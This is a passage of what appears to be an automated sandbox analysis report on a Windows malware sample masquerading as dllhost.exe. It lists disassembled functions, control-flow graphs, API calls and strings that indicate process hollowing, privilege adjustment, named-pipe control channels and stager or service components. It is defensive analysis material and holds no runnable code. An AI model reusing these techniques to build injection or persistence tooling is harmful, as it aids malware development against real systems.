                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: 16cf0cf07d351bfc07595f53eddcf13a68410e5df92f1070c1b95616c679785f
                                                        • Instruction ID: 382fdfafcf188df71275b01ec7f95dd2068c3ca20848ba32fea421f12bb9129c
                                                        • Opcode Fuzzy Hash: 16cf0cf07d351bfc07595f53eddcf13a68410e5df92f1070c1b95616c679785f
                                                        • Instruction Fuzzy Hash: 02516BB230468086EB62DF16F8587DAB7A1FB8CBD5F444215AF4A07BA8DF38D549C704
                                                        Function 00000001400036FC Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\Deadchildproc
                                                        • API String ID: 2203880229-2467240567
                                                        • Opcode ID: c810db3489ad2119f9ef1fbae4b7a74286d7b5b92ae01f9e30bd790640addf01
                                                        • Instruction ID: c0028d3d0314667bf38e8ea026a80401a8df8d922a9ec9a1a2b92cbe9fa5a050
                                                        • Opcode Fuzzy Hash: c810db3489ad2119f9ef1fbae4b7a74286d7b5b92ae01f9e30bd790640addf01
                                                        • Instruction Fuzzy Hash: 171139F121868492E726EB22F8047E96764B78DBE0F444225FB9A436F6DF7CC548C704
                                                        Function 0000000140002CB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 208 140002cb8-140002cc2 209 140002cc5-140002cd8 call 1400022fc 208->209 212 140002ce5-140002cf2 ConnectNamedPipe 209->212 213 140002cda-140002ce3 Sleep 209->213 214 140002cf4-140002d15 ReadFile 212->214 215 140002d29-140002d2e Sleep 212->215 213->209 216 140002d34-140002d3d DisconnectNamedPipe 214->216 217 140002d17-140002d1c 214->217 215->216 216->212 217->216 218 140002d1e-140002d27 217->218 218->216
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\Deadcontrol
                                                        • API String ID: 2071455217-964892075
                                                        • Opcode ID: e22c166e277d37d8911ee3c90f5aefddfa50812562ee9ae4fe93c972e7b55e2b
                                                        • Instruction ID: 60e311c102fdf720ee8a3f99fe4f98fe53f16b407cae5fa6fe3443ad4e3daf5f
                                                        • Opcode Fuzzy Hash: e22c166e277d37d8911ee3c90f5aefddfa50812562ee9ae4fe93c972e7b55e2b
                                                        • Instruction Fuzzy Hash: ED0148B1204A4482FB16EB22F8147E96360A79DBE1F544225FB66436F5CE78C948CB00
                                                        Function 000000014000363C Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 14000363c-140003690 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 229 140003692-1400036a5 K32EnumProcesses 228->229 230 1400036a7-1400036b6 229->230 231 1400036ef-1400036f8 SleepEx 229->231 232 1400036b8-1400036bc 230->232 233 1400036e0-1400036eb 230->233 231->229 234 1400036be 232->234 235 1400036cf-1400036d2 call 140003198 232->235 233->231 236 1400036c2-1400036c7 234->236 239 1400036d6 235->239 237 1400036c9-1400036cd 236->237 238 1400036da-1400036de 236->238 237->235 237->236 238->232 238->233 239->238
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                        • Instruction ID: 932927f610c79799a7423f6de90e0e5c96436069bf88993b9f6edd8e186454c1
                                                        • Opcode Fuzzy Hash: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                        • Instruction Fuzzy Hash: B81172B270061196E716DB17F81476A76A6F7C9FC1F558028EF8207B78CE3AD884CB00
                                                        Function 0000000140001FF8 Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: f7b66c7ddde02ce72e5708e93fa5b9cad22753f794ef07c2f3610d54e317b5ed
                                                        • Instruction ID: c4f78ba7dc92e043a2521667b0c692508f3cdd8a3ed11add7ef69fba4bbf15d1
                                                        • Opcode Fuzzy Hash: f7b66c7ddde02ce72e5708e93fa5b9cad22753f794ef07c2f3610d54e317b5ed
                                                        • Instruction Fuzzy Hash: FF114CB570564186EB16DB67B84439AA6A1EB8DBD1F188028FF490377BDE39C485C704
                                                        Function 000002E86A09DA9C Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 252 2e86a09da9c-2e86a09dab7 253 2e86a09daba-2e86a09dae3 252->253 254 2e86a09dae5-2e86a09daea 253->254 255 2e86a09daef-2e86a09daf8 253->255 256 2e86a09db7e-2e86a09db87 254->256 257 2e86a09db10 255->257 258 2e86a09dafa-2e86a09dafd 255->258 256->253 259 2e86a09db8d-2e86a09dba7 256->259 262 2e86a09db15-2e86a09db26 GetStdHandle 257->262 260 2e86a09db09-2e86a09db0e 258->260 261 2e86a09daff-2e86a09db07 258->261 260->262 261->262 263 2e86a09db33 262->263 264 2e86a09db28-2e86a09db31 GetFileType 262->264 265 2e86a09db35-2e86a09db37 263->265 264->265 266 2e86a09db59-2e86a09db71 265->266 267 2e86a09db39-2e86a09db44 265->267 266->256 270 2e86a09db73-2e86a09db77 266->270 268 2e86a09db46-2e86a09db4b 267->268 269 2e86a09db4d-2e86a09db50 267->269 268->256 269->256 271 2e86a09db52-2e86a09db57 269->271 270->256 271->256
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileHandleType
                                                        • String ID:
                                                        • API String ID: 3000768030-0
                                                        • Opcode ID: a491ebcf290257d12ec8eb837e4a16cf9b6865e49f739ff5ff245a9fe25edfaf
                                                        • Instruction ID: 436706d76f8b52eba31773ae64c79338f6f0bfa8fa8e18ad9762645036f6c95c
                                                        • Opcode Fuzzy Hash: a491ebcf290257d12ec8eb837e4a16cf9b6865e49f739ff5ff245a9fe25edfaf
                                                        • Instruction Fuzzy Hash: 2B31E222694B85D2EF608F14C49826966D8F745BB0F68234ADBEE273E0CF34D4E1D302
                                                        Function 000002E86A062AB8 Relevance: 1.7, APIs: 1, Instructions: 241libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 35b76960a46ac52155cfa6132bc38b190faf8d6c67efaaafb3f3cabad21d6e6e
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0B910172B412D0C7EF64CF25D148B69B39DF758BA8F5491A59E8E07788DE38D882C701
                                                        Function 0000000140002D40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 272 140002d40-140002d44 call 140002d54 274 140002d49-140002d4b ExitProcess 272->274
                                                        APIs
                                                          • Part of subcall function 0000000140002D54: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D7C
                                                          • Part of subcall function 0000000140002D54: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D8C
                                                          • Part of subcall function 0000000140002D54: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002DA6
                                                          • Part of subcall function 0000000140002D54: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DBD
                                                          • Part of subcall function 0000000140002D54: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DF5
                                                          • Part of subcall function 0000000140002D54: GetLastError.KERNEL32 ref: 0000000140002DFF
                                                          • Part of subcall function 0000000140002D54: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E08
                                                          • Part of subcall function 0000000140002D54: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E31
                                                          • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E61
                                                          • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E91
                                                          • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EA5
                                                          • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EB3
                                                          • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EC6
                                                          • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002ED4
                                                        • ExitProcess.KERNEL32 ref: 0000000140002D4B
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                        • String ID:
                                                        • API String ID: 2472495637-0
                                                        • Opcode ID: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                        • Instruction ID: 59e064767c250cdef6e9f59bcc282425e560d761e872fe105b4542e7c77ad29f
                                                        • Opcode Fuzzy Hash: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                        • Instruction Fuzzy Hash: E7A002B0A1159041DA09B77674553D91561575C741F100415611547172DD7844954655

                                                        Non-executed Functions

                                                        Function 00000001400031D8 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 332 1400031d8-1400031f9 333 1400033f1-1400033f7 332->333 334 1400031ff 332->334 335 14000356d-140003591 ReadFile 333->335 336 1400033fd-140003400 333->336 337 140003205-14000320b 334->337 338 14000335f-140003397 GetProcessHeap HeapAlloc K32EnumProcesses 334->338 339 140003626-140003638 335->339 340 140003597-14000359e 335->340 341 140003563-140003568 call 140001f68 336->341 342 140003406-14000340c 336->342 344 140003211-140003214 337->344 345 140003356-140003358 ExitProcess 337->345 338->339 343 14000339d-1400033ae 338->343 340->339 348 1400035a4-1400035df GetProcessHeap HeapAlloc call 140001cdc 340->348 341->339 349 140003412-140003415 342->349 350 140003508-14000351b call 1400020e8 342->350 343->339 351 1400033b4-1400033ea call 140001854 * 2 343->351 346 14000321a-14000321d 344->346 347 1400032be-1400032e9 RegOpenKeyExW 344->347 353 140003223-140003226 346->353 354 1400032af-1400032b9 346->354 359 140003327-140003351 call 140002168 * 2 call 140001f68 call 140001794 call 140001ff8 347->359 360 1400032eb-140003321 RegDeleteValueW * 3 347->360 373 1400035e1-1400035e7 348->373 374 140003612-140003620 GetProcessHeap HeapFree 348->374 356 140003454-140003465 call 1400020e8 349->356 357 140003417-14000341d 349->357 350->339 376 140003521-140003530 call 1400020e8 350->376 387 1400033ec 351->387 363 1400032a2-1400032aa 353->363 364 140003228-14000322e 353->364 354->339 356->339 385 14000346b-14000348d ReadFile 356->385 357->339 366 140003423-14000344d call 140002c64 call 140002c90 ExitProcess 357->366 359->339 360->359 363->339 364->339 372 140003234-140003258 ReadFile 364->372 372->339 381 14000325e-140003265 372->381 373->374 382 1400035e9-1400035fb 373->382 374->339 376->339 400 140003536-14000355e ShellExecuteW 376->400 381->339 389 14000326b-14000329d call 140001854 * 2 381->389 390 140003601-140003609 382->390 391 1400035fd-1400035ff 382->391 385->339 386 140003493-14000349a 385->386 386->339 394 1400034a0-1400034de GetProcessHeap HeapAlloc ReadFile 386->394 387->339 389->339 390->374 398 14000360b 390->398 391->390 397 14000360d call 140001ed8 391->397 394->374 401 1400034e4-1400034f0 394->401 397->374 398->382 400->339 401->374 405 1400034f6-140003503 call 140002430 401->405 405->374
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                        • String ID: Deaddll32$Deaddll64$Deadstager$Deadsvc32$Deadsvc64$SOFTWARE$open
                                                        • API String ID: 4225498131-962349031
                                                        • Opcode ID: 450fa506a82a4360291a73bcf3c1966bc75cf997108b410fe434a52d5e732181
                                                        • Instruction ID: bee31f4bb4eca69dbc2064e24843e613eed87fcc0e5c67a3900ab23587beb8cd
                                                        • Opcode Fuzzy Hash: 450fa506a82a4360291a73bcf3c1966bc75cf997108b410fe434a52d5e732181
                                                        • Instruction Fuzzy Hash: 0AB139F1204A8096EB7BDF27F8543EA22A9F74C7C4F458125FB0A47AB5DE798645C700
                                                        Function 0000000140002430 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 321injectionthreadmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                        • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                        • API String ID: 1036100660-1371749706
                                                        • Opcode ID: 2ae28259712622d184201cd73a669a884a860a96c12e014958bbe065557aa5e1
                                                        • Instruction ID: 07848a9698b11e3d894769372e26ec50b4a2d47e9cb93284ff33e8dea5ca0528
                                                        • Opcode Fuzzy Hash: 2ae28259712622d184201cd73a669a884a860a96c12e014958bbe065557aa5e1
                                                        • Instruction Fuzzy Hash: BCD16EB670165187EB62DB67F84479AB7A0FB88BC4F004014EF8947BA4DF78D599CB04
                                                        Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 134memoryregistrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: ee98945699b493ad29f20a887b5fb4f589f7881d066e3db2e487dbd33c4d129b
                                                        • Instruction ID: 43922e32370d32dc73654900e2d3c725cb019758062c5c0b8a591c9e0bc80e85
                                                        • Opcode Fuzzy Hash: ee98945699b493ad29f20a887b5fb4f589f7881d066e3db2e487dbd33c4d129b
                                                        • Instruction Fuzzy Hash: AE5127B2604B8486EB16DF62F4483AA77A1F788BD9F444124EB4A07B79DF38C545C704
                                                        Function 000002E86A0981B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: a3ef9d63b5aebb4938eb00ecce4b407a00aca507731d76c20dd7420999df12ad
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 9D314C76245AC0CAEF608F60E8547DE7368F798744F44502ADB8E57B95DF38C588C711
                                                        Function 000002E86A09B62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: ad6781946adf8ad9da84d22255c40b826761354fad0033cc1628a1cfab091887
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: EC316B36254B80C6EF208B25E88479EB3A8F789764F501156EA9D43BA9DF38C1858B01
                                                        Function 000002E86A0A0018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: c5170a04df0c4425d30fccf0a02dadffd25407b19dc1a0e6385cc815b63f03fc
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 4AE1DA62B58AC4CAEF00CF64D48829D7BB9F345788F148156DF8E57B9ADE38C896C701
                                                        Function 000002E86A06B150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: c4433d23788f0fa9bc4922a32a35d42067d2402ff1a48462fdc438ddbe4a7116
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: B451D3A27907E4C5EF10DFA6D808A9D27ECF759BD8F845521EE8D07B86DE38C0818301
                                                        Function 000002E86A09BF5C Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6443cbb4f478dc75769a01e0e5b16e240a4b2319269658760e585958f13e3c18
                                                        • Instruction ID: 4b364da67614e13366b8919093d8d584769c9c4ff1299579ad43355a02afaa43
                                                        • Opcode Fuzzy Hash: 6443cbb4f478dc75769a01e0e5b16e240a4b2319269658760e585958f13e3c18
                                                        • Instruction Fuzzy Hash: 0051F422B447D0D8FF208B76E80829E7BA9B741BE4F145255EEDD67A86CF38C581C701
                                                        Function 000002E86A0715C0 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
